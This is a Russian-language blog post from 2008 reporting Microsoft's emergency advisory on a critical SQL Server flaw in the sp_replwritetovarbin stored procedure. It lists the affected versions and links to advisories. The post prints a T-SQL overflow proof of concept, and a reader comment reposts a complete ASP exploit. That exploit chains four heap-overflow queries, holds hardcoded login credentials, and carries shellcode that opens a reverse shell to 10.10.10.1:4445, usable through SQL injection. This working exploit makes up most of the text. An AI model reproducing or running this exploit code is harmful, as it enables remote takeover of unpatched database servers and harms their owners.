Microsoft SQL Server находится в серьезной опасности

Вчера вечером корпорация Microsoft опубликовала экстренный бюллетень безопасности, в котором сообщается о налиции крайне критической уязвимости в системе Microsoft SQL Server.

Пользователя сообщили, что работе корпоративной СУБД угрожает серьезная опасность, так как эксплойт новой уязвимости уже находится в руках злоумышленников.

Атаке могут быть подвержены пользователи, использующие Microsoft SQL Server 2000, Microsoft SQL Server 2005, Microsoft SQL Server 2005 Express Edition, Microsoft SQL Server 2000 Desktop Engine (MSDE 2000), Microsoft SQL Server 2000 Desktop Engine (WMSDE) и Windows Internal Database (WYukon).

Отрадно то, что владельцы ПО Microsoft SQL Server 7.0 Service Pack 4, Microsoft SQL Server 2005 Service Pack 3 и Microsoft SQL Server 2008 могут спать спокойно – их базам данных ничего не угрожает.

Такая же проблема, не так давно, была обнаружена и в Internet Explorer, но тогда эпидемия атак расползлась по всей Сети молниеносно, что заставило Microsoft разработать внеплановый выпуск патча для своего браузера. В нынешнем случае мониторинг Microsoft не показывает серьезного распространения атак на SQL Server'ы.

Дата выпуска экстренных патчей для SQL Server пока не называются, однако в компании говорят, что "над устранением проблемы работают".

Адрес новости: http://www.winblog.ru/news/1147766030-kovarsky23120801.html

Позднее выйдет патч, закрывающий обсуждаемую лазейку в системе безопасности. Технические подробности вы найдёте на странице Microsoft Security Advisory (961040).

Подробности: http://blogs.technet.com/swi/archive/2008/12/22/more-information-about-the-sql-stored-procedure-vulnerability.aspx

А так же примеры свободно разгуливающего по Всемирной Сети злоумышленного кода:

DECLARE @buf NVARCHAR(4000),

@val NVARCHAR(4),

@counter INT

SET @buf = '

declare @retcode int,

@end_offset int,

@vb_buffer varbinary,

@vb_bufferlen int,

@buf nvarchar;

exec master.dbo.sp_replwritetovarbin 1,

@end_offset output,

@vb_buffer output,

@vb_bufferlen output,'''

SET @val = CHAR(0x41)

SET @counter = 0

WHILE @counter < 3000

BEGIN

SET @counter = @counter + 1

SET @buf = @buf + @val

END

SET @buf = @buf + ''',''1'',''1'',''1'',

''1'',''1'',''1'',''1'',''1'',''1'''

EXEC master..sp_executesql @buf

http://www.sec-consult.com/files/20081209_mssql-sp_replwritetovarbin_memwrite.txt

Опубликовано 23 декабря 2008 г. 17:09 в MSSQL

Ответов: 1

Комментарий

Knyazev_Alexey 25 декабря 2008 13:42

<html>
<%
// k`sOSe 12/17/2008
// Microsoft SQL Server "sp_replwritetovarbin()" Heap Overflow
// Tested on Win2k SP4 with MSSQL 2000(on one box only!).
// Shellcode is a slightly modified metasploit reverse shell(on 10.10.10.1 port 4445),
// the change allows multiple shots :)
//
// You need a valid SQL account, but you can also use this through an SQL-Injection simply by injecting the T-SQL stuff.

// Take a look at the comments in T-SQL

On Error Resume Next

// change this
UserName = "r00t"
Password = "t00r"

// ########################################### FIRST QUERY
SQL = "DECLARE @buf NVARCHAR(4000), "&_
"@val NVARCHAR(4), "&_
"@counter INT "&_
"SET @buf = ' "&_
"declare @retcode int, "&_
"@end_offset int, "&_
"@vb_buffer varbinary, "&_
"@vb_bufferlen int "&_
"exec master.dbo.sp_replwritetovarbin 120, @end_offset output, @vb_buffer output, @vb_bufferlen output,''' "&_
"SET @val = CHAR(0x41) "&_
"SET @counter = 0 "&_
"WHILE @counter < 3020 "&_
"BEGIN "&_
" SET @counter = @counter + 1 "&_
" IF @counter = 2900 "&_
" BEGIN "&_
" SET @val = CHAR(0x43) "&_
" END "&_
" ELSE IF @counter = 299 "&_
" BEGIN "&_
" SET @val = CHAR(0x42) "&_
" END "&_
" ELSE IF @counter = 300 "&_
" BEGIN "&_

" /* First byte overwritten here. This is a random writable address */ "&_
" SET @buf = @buf + CHAR(0x44) + char(0xc0) + char(0x4c) + CHAR(0x19) "&_
" CONTINUE "&_
" END "&_
" SET @buf = @buf + @val "&_
"END "&_
"SET @buf = @buf + ''',''33'',''34'',''35'',''36'',''37'',''38'',''39'',''40'',''41''' "&_
"EXEC master..sp_executesql @buf"

// ########################################### SECOND QUERY
SQL2 = "DECLARE @buf NVARCHAR(4000), "&_
"@val NVARCHAR(4), "&_
"@counter INT "&_
"SET @buf = ' "&_
"declare @retcode int, "&_
"@end_offset int, "&_
"@vb_buffer varbinary, "&_
"@vb_bufferlen int "&_
"exec master.dbo.sp_replwritetovarbin 120, @end_offset output, @vb_buffer output, @vb_bufferlen output,''' "&_
"SET @val = CHAR(0x41) "&_
"SET @counter = 0 "&_
"WHILE @counter < 3097 "&_
"BEGIN "&_
" SET @counter = @counter + 1 "&_
" IF @counter = 2900 "&_
" BEGIN "&_
" SET @val = CHAR(0x43) "&_
" END "&_
" ELSE IF @counter = 299 "&_
" BEGIN "&_
" SET @val = CHAR(0x42) "&_
" END "&_
" ELSE IF @counter = 300 "&_
" BEGIN "&_

" /* Second byte overwritten here */ "&_
" SET @buf = @buf + CHAR(0x45) + char(0xc0) + char(0x4c) + CHAR(0x19) "&_
" CONTINUE "&_
" END "&_
" SET @buf = @buf + @val "&_
"END "&_
"SET @buf = @buf + ''',''33'',''34'',''35'',''36'',''37'',''38'',''39'',''40'',''41''' "&_
"EXEC master..sp_executesql @buf"

// ########################################### THIRD QUERY
SQL3 = "DECLARE @buf NVARCHAR(4000), "&_
"@val NVARCHAR(4), "&_
"@counter INT "&_
"SET @buf = ' "&_
"declare @retcode int, "&_
"@end_offset int, "&_
"@vb_buffer varbinary, "&_
"@vb_bufferlen int "&_
"exec master.dbo.sp_replwritetovarbin 120, @end_offset output, @vb_buffer output, @vb_bufferlen output,''' "&_
"SET @val = CHAR(0x41) "&_
"SET @counter = 0 "&_
"WHILE @counter < 3021 "&_
"BEGIN "&_
" SET @counter = @counter + 1 "&_
" IF @counter = 2900 "&_
" BEGIN "&_
" SET @val = CHAR(0x43) "&_
" END "&_
" ELSE IF @counter = 299 "&_
" BEGIN "&_
" SET @val = CHAR(0x42) "&_
" END "&_
" ELSE IF @counter = 300 "&_
" BEGIN "&_

" /* Third byte overwritten here */ "&_
" SET @buf = @buf + CHAR(0x46) + char(0xc0) + char(0x4c) + CHAR(0x19) "&_
" CONTINUE "&_
" END "&_
" SET @buf = @buf + @val "&_
"END "&_
"SET @buf = @buf + ''',''33'',''34'',''35'',''36'',''37'',''38'',''39'',''40'',''41''' "&_
"EXEC master..sp_executesql @buf"

// ########################################### FOURTH QUERY
SQL4 = "DECLARE @buf NVARCHAR(4000), "&_
"@val NVARCHAR(4), "&_
"@counter INT "&_
"SET @buf = ' "&_
"declare @retcode int, "&_
"@end_offset int, "&_
"@vb_buffer varbinary, "&_
"@vb_bufferlen int "&_
"exec master.dbo.sp_replwritetovarbin 120, @end_offset output, @vb_buffer output, @vb_bufferlen output,''' "&_
"SET @val = CHAR(0x41) "&_
"SET @counter = 0 "&_
"WHILE @counter < 2708 "&_
"BEGIN "&_
" SET @counter = @counter + 1 "&_
" IF @counter = 2900 "&_
" BEGIN "&_
" SET @val = CHAR(0x43) "&_
" END "&_
" IF @counter = 108 "&_
" BEGIN "&_

" /* this is the pointer we wrote - 0x38. It points to a CALL ECX */ "&_
" SET @buf = @buf + CHAR(0x10) + CHAR(0xc0) + CHAR(0x4c) + CHAR(0x19) "&_

" /* realign code */ "&_
" SET @buf = @buf + CHAR(0xe1) "&_

" /* realign the stack */ "&_
" SET @buf = @buf + CHAR(0x83) + CHAR(0xe4) + CHAR(0xfc) "&_

" /* jump ahead */ "&_
" SET @buf = @buf + CHAR(0xe9) + CHAR(0xba) + CHAR(0x00) + CHAR(0x00) + CHAR(0x00) "&_
" SET @counter = @counter + 12 "&_
" CONTINUE "&_
" END "&_
" ELSE IF @counter = 299 "&_
" BEGIN "&_
" SET @val = CHAR(0x42) "&_
" END "&_
" ELSE IF @counter = 300 "&_
" BEGIN "&_

" /* Fourth byte overwritten here */ "&_
" SET @buf = @buf + CHAR(0x47) + char(0xc0) + char(0x4c) + CHAR(0x19) "&_

" /* reverse shell on 10.10.10.1:4445 */ "&_
" SET @buf=@buf+CHAR(0xfc)+CHAR(0x6a)+CHAR(0xeb)+CHAR(0x4d)+CHAR(0xe8)+CHAR(0xf9)+CHAR(0xff)+CHAR(0xff)+CHAR(0xff)+CHAR(0x60)+CHAR(0x8b)+CHAR(0x6c)+CHAR(0x24)+CHAR(0x24)+CHAR(0x8b)+CHAR(0x45)+CHAR(0x3c)+CHAR(0x8b)+CHAR(0x7c)+CHAR(0x05)+CHAR(0x78)+CHAR(0x01)+CHAR(0xef)+CHAR(0x8b)+CHAR(0x4f)+CHAR(0x18)+CHAR(0x8b)+CHAR(0x5f)+CHAR(0x20)+CHAR(0x01)+CHAR(0xeb)+CHAR(0x49)+CHAR(0x8b)+CHAR(0x34)+CHAR(0x8b)+CHAR(0x01)+CHAR(0xee)+CHAR(0x31)+CHAR(0xc0)+CHAR(0x99)+CHAR(0xac)+CHAR(0x84)+CHAR(0xc0)+CHAR(0x74)+CHAR(0x07)+CHAR(0xc1)+CHAR(0xca)+CHAR(0x0d)+CHAR(0x01)+CHAR(0xc2)+CHAR(0xeb)+CHAR(0xf4)+CHAR(0x3b)+CHAR(0x54)+CHAR(0x24)+CHAR(0x28)+CHAR(0x75)+CHAR(0xe5)+CHAR(0x8b)+CHAR(0x5f)+CHAR(0x24)+CHAR(0x01)+CHAR(0xeb)+CHAR(0x66)+CHAR(0x8b)+CHAR(0x0c)+CHAR(0x4b)+CHAR(0x8b)+CHAR(0x5f)+CHAR(0x1c)+CHAR(0x01)+CHAR(0xeb)+CHAR(0x03)+CHAR(0x2c)+CHAR(0x8b)+CHAR(0x89)+CHAR(0x6c)+CHAR(0x24)+CHAR(0x1c)+CHAR(0x61)+CHAR(0xc3)+CHAR(0x31)+CHAR(0xdb)+CHAR(0x64)+CHAR(0x8b)+CHAR(0x43)+CHAR(0x30)+CHAR(0x8b)+CHAR(0x40)+CHAR(0x0c)+CHAR(0x8b)+CHAR(0x70)+CHAR(0x1c)+CHAR(0xad)+CHAR(0x8b)+CHAR(0x40)+CHAR(0x08)+CHAR(0x5e)+CHAR(0x68)+CHAR(0x8e)+CHAR(0x4e)+CHAR(0x0e)+CHAR(0xec)+CHAR(0x50)+CHAR(0xff)+CHAR(0xd6)+CHAR(0x66)+CHAR(0x53)+CHAR(0x66)+CHAR(0x68)+CHAR(0x33)+CHAR(0x32)+CHAR(0x68)+CHAR(0x77)+CHAR(0x73)+CHAR(0x32)+CHAR(0x5f)+CHAR(0x54)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x68)+CHAR(0xcb)+CHAR(0xed)+CHAR(0xfc)+CHAR(0x3b)+CHAR(0x50)+CHAR(0xff)+CHAR(0xd6)+CHAR(0x5f)+CHAR(0x89)+CHAR(0xe5)+CHAR(0x66)+CHAR(0x81)+CHAR(0xed)+CHAR(0x08)+CHAR(0x02)+CHAR(0x55)+CHAR(0x6a)+CHAR(0x02)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x68)+CHAR(0xd9)+CHAR(0x09)+CHAR(0xf5)+CHAR(0xad)+CHAR(0x57)+CHAR(0xff)+CHAR(0xd6)+CHAR(0x53)+CHAR(0x53)+CHAR(0x53)+CHAR(0x53)+CHAR(0x43)+CHAR(0x53)+CHAR(0x43)+CHAR(0x53)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x68)+CHAR(0x0a)+CHAR(0x0a)+CHAR(0x0a)+CHAR(0x01)+CHAR(0x66)+CHAR(0x68)+CHAR(0x11)+CHAR(0x5d)+CHAR(0x66)+CHAR(0x53)+CHAR(0x89)+CHAR(0xe1)+CHAR(0x95)+CHAR(0x68)+CHAR(0xec)+CHAR(0xf9)+CHAR(0xaa)+CHAR(0x60)+CHAR(0x57)+CHAR(0xff)+CHAR(0xd6)+CHAR(0x6a)+CHAR(0x10)+CHAR(0x51)+CHAR(0x55)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x66)+CHAR(0x6a)+CHAR(0x64)+CHAR(0x66)+CHAR(0x68)+CHAR(0x63)+CHAR(0x6d)+CHAR(0x6a)+CHAR(0x50)+CHAR(0x59)+CHAR(0x29)+CHAR(0xcc)+CHAR(0x89)+CHAR(0xe7)+CHAR(0x6a)+CHAR(0x44)+CHAR(0x89)+CHAR(0xe2)+CHAR(0x31)+CHAR(0xc0)+CHAR(0xf3)+CHAR(0xaa)+CHAR(0x95)+CHAR(0x89)+CHAR(0xfd)+CHAR(0xfe)+CHAR(0x42)+CHAR(0x2d)+CHAR(0xfe)+CHAR(0x42)+CHAR(0x2c)+CHAR(0x8d)+CHAR(0x7a)+CHAR(0x38)+CHAR(0xab)+CHAR(0xab)+CHAR(0xab)+CHAR(0x68)+CHAR(0x72)+CHAR(0xfe)+CHAR(0xb3)+CHAR(0x16)+CHAR(0xff)+CHAR(0x75)+CHAR(0x28)+CHAR(0xff)+CHAR(0xd6)+CHAR(0x5b)+CHAR(0x57)+CHAR(0x52)+CHAR(0x51)+CHAR(0x51)+CHAR(0x51)+CHAR(0x6a)+CHAR(0x01)+CHAR(0x51)+CHAR(0x51)+CHAR(0x55)+CHAR(0x51)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x68)+CHAR(0xad)+CHAR(0xd9)+CHAR(0x05)+CHAR(0xce)+CHAR(0x53)+CHAR(0xff)+CHAR(0xd6)+CHAR(0x6a)+CHAR(0xff)+CHAR(0xff)+CHAR(0x37)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x68)+CHAR(0xe7)+CHAR(0x79)+CHAR(0xc6)+CHAR(0x79)+CHAR(0xff)+CHAR(0x75)+CHAR(0x04)+CHAR(0xff)+CHAR(0xd6)+CHAR(0xff)+CHAR(0x77)+CHAR(0xfc)+CHAR(0xff)+CHAR(0xd0)+CHAR(0x68)+CHAR(0xef)+CHAR(0xce)+CHAR(0xe0)+CHAR(0x60)+CHAR(0x53)+CHAR(0xff)+CHAR(0xd6) "&_
" CONTINUE "&_
" END "&_
" SET @buf = @buf + @val "&_
"END "&_
"SET @buf = @buf + ''',''33'',''34'',''35'',''36'',''37'',''38'',''39'',''40'',''41''' "&_
"EXEC master..sp_executesql @buf"

Set oConnection = Server.CreateObject("ADODB.Connection")
oConnection.Open "Provider=SQLOLEDB; Data Source=; Initial Catalog=; User ID=" & UserName & "; Password=" & Password
Set rs = Server.CreateObject("ADODB.Recordset")

phase = Request.Querystring("p")

if phase then
if phase = 1 then
rs.open SQL3, oConnection
rs.close
oConnection.Close
Set oConnection = Nothing
Response.Redirect("sql-exploit.asp?p=2")
elseif phase = 2 then
rs.open SQL4, oConnection
rs.close
oConnection.Close
Set oConnection = Nothing
Response.Redirect("sql-exploit.asp?p=3")
end if
Else
rs.open SQL, oConnection
rs.close
oConnection.Close
Set oConnection = Nothing

Set oConnection = Server.CreateObject("ADODB.Connection")
oConnection.Open "Provider=SQLOLEDB; Data Source=; Initial Catalog=; User ID=" & UserName & "; Password=" & Password
Set rs = Server.CreateObject("ADODB.Recordset")
rs.open SQL2, oConnection
rs.close
oConnection.Close
Set oConnection = Nothing

Response.Redirect("sql-exploit.asp?p=1")
end if

%>

</html>

# milw0rm.com [2008-12-17]

Стань частью ИТ-сообщества

Microsoft SQL Server находится в серьезной опасности

Комментарий

Блог

Календарь

Категории

Синдикация

Виртуальные сообщества

Сообщества сайтов (тэгами)